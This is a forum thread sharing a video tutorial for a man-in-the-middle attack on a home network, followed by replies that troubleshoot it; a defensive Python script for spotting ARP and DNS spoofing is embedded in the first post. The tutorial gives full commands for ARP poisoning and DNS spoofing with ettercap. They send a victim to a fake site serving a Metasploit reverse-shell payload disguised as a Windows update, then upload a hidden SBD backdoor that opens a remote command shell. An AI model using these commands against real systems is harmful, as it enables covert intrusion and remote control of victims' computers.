Thread: [Video] Man In The Middle (MITM) Attack (ettercap, metasploit, sbd)

  1. #1

    [Video] Attack: Man In The Middle {MITM} (ettercap, metasploit, SBD)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/2319124
    Download video: http://www.mediafire.com/download.php?ml5lto4ykyq
    Commands: http://pastebin.com/f6f4a936


    What is this?
    By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.


    How does this work?

    > Ettercap to do the MITM Attack
    > Metasploit for the exploit
    > Secure BackDoor (SBD) for the backdoor
    > Apache for the web server


    What do I need?
    > Ettercap
    > Metasploit
    > A web server
    > SBD (optional)
    *all of this is on backtrack 4*


    Network Setup:
    Attackers IP: 192.168.1.104
    Targets IP: 192.168.1.101
    Gateway IP: 192.168.1.1


    Software
    Name: Ettercap
    Version: 0.7.3
    Home Page: http://ettercap.sourceforge.net
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

    Name: Metasploit
    Version: 3.3
    Home Page: http://www.metasploit.com/
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download

    Name: SBD
    Version: 1.36
    Home Page: http://tigerteam.se
    Download Link: http://prdownloads.sourceforge.net/e...ar.gz?download
    Source: http://www2.packetstormsecurity.org/...earchvalue=sbd


    Commands:
    Code:
    /pentest/exploits/framework3/msfpayload/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
    kate /var/www/index.html
    >*Replace filename with new one, Windows-KB183905-x86-ENU.exe*
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcper
    SET LHOAT 192.168.1.104
    exploit
    
    cd /usr/share/ettercap/mv -f etter.dns etter.dns.old
    kate etter.dns
    > * A 192.168.1.104
    ettercap -i wlan0 -T -q -P dns_spoof -M ARP /http://192.168.1.1/ /http://192.168.1.101/
    
    upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
    execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"
    
    wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332

    Notes:
    Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.

    Video length: 06:57
    Capture length: 7:40
    Song: Mr. Scruff - Is He Ready, Mr. Scruff - Get a Move On

    Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-man-in-middle-mitm-attack.html
    Forum Post: http://forums.remote-exploit.org/bt4-videos/27173-video-man-middle-mitm-attack-ettercap-metasploit-sbd.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:
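
From the defender's side, the ARP poisoning and the wildcard `* A 192.168.1.104` entry in the post above leave two traces: the gateway's MAC address is shared with another host in the target's ARP cache, and unrelated public hostnames all resolve to one private address. The following is an added example, not part of the original post; the function names are hypothetical and the sample data is constructed from the thread's addresses.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `arp -an` output as seen on a host whose cache is poisoned:
# the gateway (192.168.1.1) and another LAN host share one MAC address.
ARP_SAMPLE = """\
? (192.168.1.1) at 00:0c:29:aa:bb:cc [ether] on eth0
? (192.168.1.104) at 00:0c:29:aa:bb:cc [ether] on eth0
? (192.168.1.50) at 00:1d:7e:11:22:33 [ether] on eth0
"""

# Constructed DNS answers (queried name, returned A record) from a sensor.
DNS_SAMPLE = [
    ("www.example.com", "192.168.1.104"),
    ("mail.example.org", "192.168.1.104"),
    ("update.example.net", "192.168.1.104"),
    ("printer.lan", "192.168.1.20"),
]

ARP_RE = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-fA-F:]{17})")

def shared_macs(arp_text, gateway):
    """Return {mac: [ips]} for MACs claimed by the gateway and another IP."""
    by_mac = defaultdict(list)
    for ip, mac in ARP_RE.findall(arp_text):
        by_mac[mac.lower()].append(ip)
    return {m: sorted(ips) for m, ips in by_mac.items()
            if gateway in ips and len(ips) > 1}

def spoofed_answers(answers, local_suffixes=(".lan", ".local"), threshold=2):
    """Return private IPs that answer for several unrelated public names."""
    names_by_ip = defaultdict(set)
    for name, addr in answers:
        if name.endswith(local_suffixes):
            continue  # internal names may legitimately map to private IPs
        if ipaddress.ip_address(addr).is_private:
            names_by_ip[addr].add(name)
    return {ip: sorted(n) for ip, n in names_by_ip.items()
            if len(n) >= threshold}

if __name__ == "__main__":
    print(shared_macs(ARP_SAMPLE, "192.168.1.1"))
    print(spoofed_answers(DNS_SAMPLE))
```

Either result being non-empty is a reason to compare the gateway's MAC against a known-good value; a static ARP entry for the gateway on the client removes the first condition.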

  2. #2
    coool
    Guest

    thank you

    can upload your index.html

  3. #3
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    5

    Quote Originally Posted by g0tmi1k
    Hey all!

    Using a few tools to gain access to command line on the target PC.

    What is this?
    By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.

    How does this work?
    > Ettercap to do the MITM Attack
    > Metasploit for the exploit
    > Secure BackDoor (SBD) for the backdoor
    > Apache for the web server

    What do I need?
    > Ettercap
    > Metasploit
    > SBD (optional)
    > Web server
    *all of this is on backtrack 4*

    How to:
    Attackers IP: 192.168.1.104
    Targets IP: 192.168.1.101
    Gateway IP: 192.168.1.1

    Notes:
    This is cut from my final video called "g0tmi1k's home network".


    Thank you
    I will drink the milk

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    84

    Great Tuto

    what's the best backdoor can work under linux to hack win-box ?

  5. #5
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Excellent tutorial but I have a little problem. I practice in my home network and when I activate dns_spoof in ettercap and go to my other computer and start Internet Explorer it doesn't show me the Index I created.

    P.S. : sniffing with ettercap works and other stuff

  6. #6
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    12

    Quote Originally Posted by sickness
    Excellent tutorial but I have a little problem. I practice in my home network and when I activate dns_spoof in ettercap and go to my other computer and start Internet Explorer it doesn't show me the Index I created.

    P.S. : sniffing with ettercap works and other stuff
    -> Hi,
    Have you started your apache on your attacker computer?

  7. #7
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Apache running ... but still nothing
